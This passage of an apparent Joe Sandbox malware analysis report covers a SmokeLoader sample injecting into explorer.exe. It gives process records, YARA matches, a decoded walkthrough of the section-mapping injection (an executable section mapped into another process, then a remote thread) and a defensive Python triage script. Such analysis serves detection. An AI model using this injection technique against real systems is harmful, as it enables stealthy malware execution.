                                                                                                                                                    Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    Imagebase:0xfa0000
                                                                                                                                                    File size:4'514'184 bytes
                                                                                                                                                    MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:18
                                                                                                                                                    Start time:03:21:52
                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                    Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    Imagebase:0x7ff66f390000
                                                                                                                                                    File size:4'514'184 bytes
                                                                                                                                                    MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Has exited:false

                                                                                                                                                    Target ID:19
                                                                                                                                                    Start time:03:21:53
                                                                                                                                                    Start date:09/01/2025
                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\explorer.exe
                                                                                                                                                    Imagebase:0x7ff70ffd0000
                                                                                                                                                    File size:5'141'208 bytes
                                                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Has exited:true

Target ID: 20
Start time: 03:21:54
Start date: 09/01/2025
Path: C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\explorer.exe
Imagebase: 0xfa0000
File size: 4'514'184 bytes
MD5 hash: DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000014.00000002.2523725408.0000000000861000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited: false

Target ID: 23
Start time: 03:21:54
Start date: 09/01/2025
Path: C:\Windows\System32\WerFault.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\WerFault.exe -u -p 2508 -s 696
Imagebase: 0x7ff68d170000
File size: 570'736 bytes
MD5 hash: FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 24
Start time: 03:21:55
Start date: 09/01/2025
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\explorer.exe
Imagebase: 0x7ff70ffd0000
File size: 5'141'208 bytes
MD5 hash: 662F4F92FDE3557E86D110526BB578D5
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000018.00000002.2523151456.00000000009E1000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited: false

Target ID: 26
Start time: 03:21:56
Start date: 09/01/2025
Path: C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\explorer.exe
Imagebase: 0xfa0000
File size: 4'514'184 bytes
MD5 hash: DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 27
Start time: 03:21:57
Start date: 09/01/2025
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\explorer.exe
Imagebase: 0x7ff70ffd0000
File size: 5'141'208 bytes
MD5 hash: 662F4F92FDE3557E86D110526BB578D5
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false


Execution Graph

Execution Coverage: 8%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 57.1%
Total number of Nodes: 56
Total number of Limit Nodes: 2

Control-flow Graph

APIs
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
Memory Dump Source
• Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectView
• String ID:
• API String ID: 1652636561-0
• Opcode ID: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
• Instruction ID: b0857a4fb145544e41851af17f16183f6357fb9efc2fe45eaf6198d87de3a54a
• Opcode Fuzzy Hash: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
• Instruction Fuzzy Hash: 8681E171600248BBDB218FA5DC88FEB7FB8FF86710F10416AF951BA1E5D6749901CB64

Control-flow Graph

APIs
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
Memory Dump Source
• Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
• Instruction ID: cb32da509904316ed93400f6898fa9d135e0c3db95e2781c81c9f365a62fd76c
• Opcode Fuzzy Hash: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
• Instruction Fuzzy Hash: 8D617F71A00244FBEB219F91CC49FAF7BB8FF85B00F10412AF912BA1E4D6749A01DB65

Control-flow Graph

APIs
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
Memory Dump Source
• Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
• Instruction ID: a9c2a09af8f6974916e8dbce0e9e74a1ab8539b6b4ce2c8be6c8dc9eb24f9302
• Opcode Fuzzy Hash: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
• Instruction Fuzzy Hash: 675127B5900245BBEB209F91CC48FABBBB8EF85B00F104169FA11BA2E5D6759941CB24

Control-flow Graph
Graph image not preserved (executed/not-executed colouring lost). Blocks of the function at 4014eb that call out: 4014eb-401519 call 401164; 40156f-401586 NtDuplicateObject; 40158c-4015b0 NtCreateSection; 4015b2-4015d3 NtMapViewOfSection; 4015d5-4015f1 NtMapViewOfSection; 40160c-401632 NtCreateSection; 401642-401663 NtMapViewOfSection; 401669-401685 NtMapViewOfSection; 40168b call 401690; 401886-4018a3 call 401164.
APIs
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
Memory Dump Source
• Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
• Instruction ID: 9bfdfe9cbb785be4fdfd0dd6995845ce59af7eac5c2f91023a42677e7735ba1d
• Opcode Fuzzy Hash: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
• Instruction Fuzzy Hash: 9D5127B5900248BBEB209F91CC48FAFBBB8EF85B00F104159FA11BA2E5D6719905CB64
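The seven calls listed above for the function at 004014BF are the section-mapping injection primitive behind the report's "Maps a DLL or memory area into another process" signature. Decoded against the documented Nt* prototypes: both NtCreateSection calls build a pagefile-backed section (FileHandle 00000000, AllocationAttributes 08000000 = SEC_COMMIT); the first with DesiredAccess 00000006 (SECTION_MAP_WRITE|SECTION_MAP_READ) and PAGE_READWRITE (00000004), the second with 0000000E (adds SECTION_MAP_EXECUTE) and PAGE_EXECUTE_READWRITE (00000040). Each section is then mapped twice: once with ProcessHandle 000000FF, which this report appears to print for the -1 current-process pseudo-handle (an assumption, since a real handle value would be a multiple of 4), and once with an unknown handle, i.e. into another process, where the second section's view is PAGE_EXECUTE_READ (00000020). Bytes written to the local view appear in the target without any WriteProcessMemory. The thread that runs the mapped view is created elsewhere (RtlCreateUserThread followed by NtTerminateProcess at 403042-4030b1 in the graph of the function at 402f5d), after the Sleep(00001388), i.e. 5000 ms, seen in the 4018xx functions. The script below is an added triage example, not Joe Sandbox code: it parses exactly these API lines (copied into the script as a constructed input), decodes the winnt.h flag values and reports each section that is mapped into two processes. Attributing NtMapViewOfSection calls to the most recent NtCreateSection is a heuristic, because the report prints section handles as '?'.

```python
"""Decode a Joe Sandbox "APIs" block and flag section-mapping injection.

Added example for this report page; not Joe Sandbox code. Argument positions follow
the documented NtCreateSection / NtMapViewOfSection prototypes; handle correlation
is a heuristic (see group_sections).
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed input: the seven lines listed under "APIs" for the function at 004014BF
# in this report (process 11, payload mapped at 0x400000), copied verbatim.
REPORT_API_LINES = """\
NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
"""

LINE_RE = re.compile(r"^(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)$")

# Values from winnt.h. Page protections are distinct bits, so a bit test names them too.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE",
                0x80: "PAGE_EXECUTE_WRITECOPY"}
SECTION_ACCESS = {0x01: "SECTION_QUERY", 0x02: "SECTION_MAP_WRITE", 0x04: "SECTION_MAP_READ",
                  0x08: "SECTION_MAP_EXECUTE", 0x10: "SECTION_EXTEND_SIZE"}
EXEC_PROTECT = 0x10 | 0x20 | 0x40 | 0x80
# Assumption: the report prints the -1 current-process pseudo-handle as 000000FF.
SELF_HANDLE = 0xFF


@dataclass
class ApiCall:
    name: str
    args: List[Optional[int]]  # None where the report printed '?'
    ref: int


def parse_api_line(line: str) -> ApiCall:
    """Parse one 'Name.MODULE(arg,arg,...), ref: ADDR' line (no leading bullet)."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised API line: {line!r}")
    name, _module, raw, ref = m.groups()
    return ApiCall(name, [None if a == "?" else int(a, 16) for a in raw.split(",")], int(ref, 16))


def flag_names(value: int, table: dict) -> str:
    names = [n for bit, n in table.items() if value & bit]
    return "|".join(names) if names else hex(value)


@dataclass
class SectionUse:
    created_at: int
    access: int            # NtCreateSection DesiredAccess
    protect: int           # NtCreateSection SectionPageProtection
    pagefile_backed: bool  # NtCreateSection FileHandle == 0
    local_views: List[int] = field(default_factory=list)   # Win32Protect of views in this process
    remote_views: List[int] = field(default_factory=list)  # Win32Protect of views in another process

    def is_cross_process_channel(self) -> bool:
        # One pagefile-backed section visible in two processes: writes to the local
        # view land in the other process without WriteProcessMemory.
        return self.pagefile_backed and bool(self.local_views) and bool(self.remote_views)

    def is_remote_executable(self) -> bool:
        return bool(self.protect & EXEC_PROTECT) or any(p & EXEC_PROTECT for p in self.remote_views)


def group_sections(calls: List[ApiCall]) -> List[SectionUse]:
    """Heuristic: section handles are '?' in the report, so every NtMapViewOfSection is
    attributed to the most recent NtCreateSection. Adequate for a linear API list."""
    sections: List[SectionUse] = []
    for c in calls:
        if c.name == "NtCreateSection":
            # (SectionHandle, DesiredAccess, ObjectAttributes, MaximumSize,
            #  SectionPageProtection, AllocationAttributes, FileHandle)
            sections.append(SectionUse(c.ref, c.args[1], c.args[4], c.args[6] == 0))
        elif c.name == "NtMapViewOfSection" and sections:
            # (SectionHandle, ProcessHandle, BaseAddress, ZeroBits, CommitSize, SectionOffset,
            #  ViewSize, InheritDisposition, AllocationType, Win32Protect)
            target, protect = c.args[1], c.args[9]
            views = sections[-1].local_views if target == SELF_HANDLE else sections[-1].remote_views
            views.append(protect)
    return sections


def triage(api_block: str) -> List[str]:
    """One finding per pagefile-backed section that is mapped into two processes."""
    calls = [parse_api_line(l) for l in api_block.splitlines() if l.strip()]
    findings = []
    for s in group_sections(calls):
        if not s.is_cross_process_channel():
            continue
        severity = "high" if s.is_remote_executable() else "medium"
        findings.append(
            f"{severity}: NtCreateSection@{s.created_at:08X} "
            f"[{flag_names(s.access, SECTION_ACCESS)}; {flag_names(s.protect, PAGE_PROTECT)}; "
            f"pagefile-backed] mapped locally as {[flag_names(p, PAGE_PROTECT) for p in s.local_views]}, "
            f"into another process as {[flag_names(p, PAGE_PROTECT) for p in s.remote_views]}")
    return findings


if __name__ == "__main__":
    for finding in triage(REPORT_API_LINES):
        print(finding)
```

Run as-is it reports two findings: medium for the read/write section shared with the other process, high for the executable one mapped there as PAGE_EXECUTE_READ. To triage another report, paste its APIs lines into REPORT_API_LINES without the "• " bullet and without the "Part of subcall function ...:" prefix, which the regex deliberately rejects so that inherited subcall entries are not double-counted.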

Control-flow Graph
Graph image not preserved (executed/not-executed colouring lost). Function at 402f5d: the only block that calls out is 403042-4030b1 (RtlCreateUserThread, NtTerminateProcess); exit block 4030b4-4030b9.
APIs
Memory Dump Source
• Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
Similarity
• API ID: CreateProcessTerminateThreadUser
• String ID:
• API String ID: 1921587553-0
• Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
• Instruction ID: 028c31f760cafe6bdfeacd3711728474bc178c938afdf01909161d150e4b5d3c
• Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
• Instruction Fuzzy Hash: 84416831228D094FD768EF5CA845762B7D5F798351F6643AAE809D3389EA34DC1183C6

Control-flow Graph
Graph image not preserved (executed/not-executed colouring lost). Function at 4030bf: 403055-4030b1 RtlCreateUserThread, NtTerminateProcess; 40311f-403141 call 4011db; 403145 loops on itself.
APIs
Memory Dump Source
• Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
Similarity
• API ID: CreateProcessTerminateThreadUser
• String ID:
• API String ID: 1921587553-0
• Opcode ID: c30ac68ff69c2e5b18761fee067da9d71720b063899e47dfee2d3f0b6f1a7b91
• Instruction ID: 715d93b18a869b872d6bab68aa9d9aa25fe40f65b3c459de5f1da0bbea4f6161
• Opcode Fuzzy Hash: c30ac68ff69c2e5b18761fee067da9d71720b063899e47dfee2d3f0b6f1a7b91
• Instruction Fuzzy Hash: 222105309087448FE3549F7C98423A6BFE0EB4A311F6805AFD596DA2D2D33E5A46C787

Control-flow Graph
Graph image not preserved (executed/not-executed colouring lost). Function at 4018c5: 4018c5-40190b call 401164, Sleep, call 4013cc; 40190d-401915 call 4014bf; 401952-40195b call 401164.
APIs
• Sleep.KERNELBASE(00001388), ref: 004018F6
  • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
  • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
Similarity
• API ID: CreateDuplicateObjectSectionSleep
• String ID: zOji
• API String ID: 4152845823-4118548424
• Opcode ID: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
• Instruction ID: 5008de21d6646d6a4101a84352d49cb2eeb815b2728bacd1896cd8e4e39b07a0
• Opcode Fuzzy Hash: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
• Instruction Fuzzy Hash: 46018BB2308205EBDB006E949C61EAE3658AB40724F308033F607780F1C67D8A13F31B

Control-flow Graph
Graph image not preserved (executed/not-executed colouring lost). Function at 4018a6: 4018c8-40190b call 401164, Sleep, call 4013cc; 40190d-401915 call 4014bf; 401952-40195b call 401164.
APIs
• Sleep.KERNELBASE(00001388), ref: 004018F6
  • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
  • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
Memory Dump Source
• Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
Similarity
• API ID: CreateDuplicateObjectSectionSleep
• String ID:
• API String ID: 4152845823-0
• Opcode ID: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
• Instruction ID: ec7c9f9116aa5c3d7af92c99ccf4db412f3ff1557a2b92ce3f8b18b7d449fb36
• Opcode Fuzzy Hash: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
• Instruction Fuzzy Hash: 97016DB2308305EBE7006A959C51EBA3758AB41764F308133B607780F1957D9A17B36F

Control-flow Graph
Graph image not preserved (executed/not-executed colouring lost). Function at 4018be: 4018c8-40190b call 401164, Sleep, call 4013cc; 40190d-401915 call 4014bf; 401952-40195b call 401164.
APIs
• Sleep.KERNELBASE(00001388), ref: 004018F6
  • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
  • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
Memory Dump Source
• Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
Similarity
• API ID: CreateDuplicateObjectSectionSleep
• String ID:
• API String ID: 4152845823-0
• Opcode ID: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
• Instruction ID: cc5cf84a4ac16d3ff6e0150408ab5a4d949569ac012fe2ee23f61dbe8ee8ec54
• Opcode Fuzzy Hash: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
• Instruction Fuzzy Hash: 70014CB2308205EBDB106A959C51EBE3659AB55714F308133B607784F1967D9B13F32B

Control-flow Graph
Graph image not preserved (executed/not-executed colouring lost). Function at 4018b1: 4018c8-401900 call 401164, Sleep; 401903-40190b call 4013cc; 40190d-401915 call 4014bf; 401952-40195b call 401164.
APIs
• Sleep.KERNELBASE(00001388), ref: 004018F6
Memory Dump Source
• Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
• Instruction ID: ef1b3772686a797e33556ea01ceab6b668eb93d7b49977ee198856b5a882b22d
• Opcode Fuzzy Hash: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
• Instruction Fuzzy Hash: 210125B2208245EADB006A959C61EBA3799AB41724F308137F607790F1967E8A13F31B

Control-flow Graph
Graph image not preserved (executed/not-executed colouring lost). Function at 4018c2: 4018c2-40190b call 401164, Sleep, call 4013cc; 40190d-401915 call 4014bf; 401952-40195b call 401164.
APIs
• Sleep.KERNELBASE(00001388), ref: 004018F6
  • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
  • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
Memory Dump Source
• Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
Similarity
• API ID: CreateDuplicateObjectSectionSleep
• String ID:
• API String ID: 4152845823-0
                                                                                                                                                      • Opcode ID: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
                                                                                                                                                      • Instruction ID: d3c1b2561fc0583f1f6bbc3edf5ccb050f557452f45edf8007d0f6b78c0567ac
                                                                                                                                                      • Opcode Fuzzy Hash: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
                                                                                                                                                      • Instruction Fuzzy Hash: 14017CB2308205EBDB006A919C51EBE3759AB41724F308133F607780F1967D8A13F31B

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 353 4018da-40190b call 401164 Sleep call 4013cc 360 40191a-401920 353->360 361 40190d-401915 call 4014bf 353->361 364 401931 360->364 365 401928-40192d 360->365 361->360 364->365 366 401934-40194f 364->366 365->366 371 401952-40195b call 401164 366->371 372 401948-40194b 366->372 372->371
                                                                                                                                                      APIs
                                                                                                                                                      • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                                                                                                                        • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                        • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                      • Opcode ID: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
                                                                                                                                                      • Instruction ID: 8f9a98739febab8b32419077b991bda00f1387bd451c7178a571841fb0c6b49c
                                                                                                                                                      • Opcode Fuzzy Hash: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
                                                                                                                                                      • Instruction Fuzzy Hash: A8F044B6204205EBDB006E959C51FAE3768AB44725F344133F612790F1C67D8A52F71B
Memory Dump Source
• Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
• Instruction ID: 407047d8813846ed623c6620c5c661c30d6a874651c06bbb2e7ade0d14a7dce7
• Opcode Fuzzy Hash: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
• Instruction Fuzzy Hash: 92117D2020C541FCD321D27CCA0C911BFA99B4F72075401FBD691250C3DAB9094AEBAB
Memory Dump Source
• Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
• Instruction ID: 5db6927ec116302fd1a3f9be718c7712ee400501de5b38768fcc91fc62191cbb
• Opcode Fuzzy Hash: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
• Instruction Fuzzy Hash: 56117D2024C581ECD321D37CCA48914BFA69B4F72076801FBD691694C3CAB9454AEBAB
Memory Dump Source
• Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
• Instruction ID: 863a443b315763638c31dffea77139fa9fc7248c2f9879795720f54bbf800da4
• Opcode Fuzzy Hash: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
• Instruction Fuzzy Hash: 4F115C2020C941ADD321D37CCA08914BFA59B4F72075802FBD6915A0C6CA79454AEF97
Memory Dump Source
• Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
• Instruction ID: 0c8bb5551e2abd97a64ae9c19d193427848800bdc9eaee9e975189e24a5225cd
• Opcode Fuzzy Hash: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
• Instruction Fuzzy Hash: 56112C2020C581EDD321D27CCA09514BF959B4F72475801FBD691690C6DA79454AEB9B
Memory Dump Source
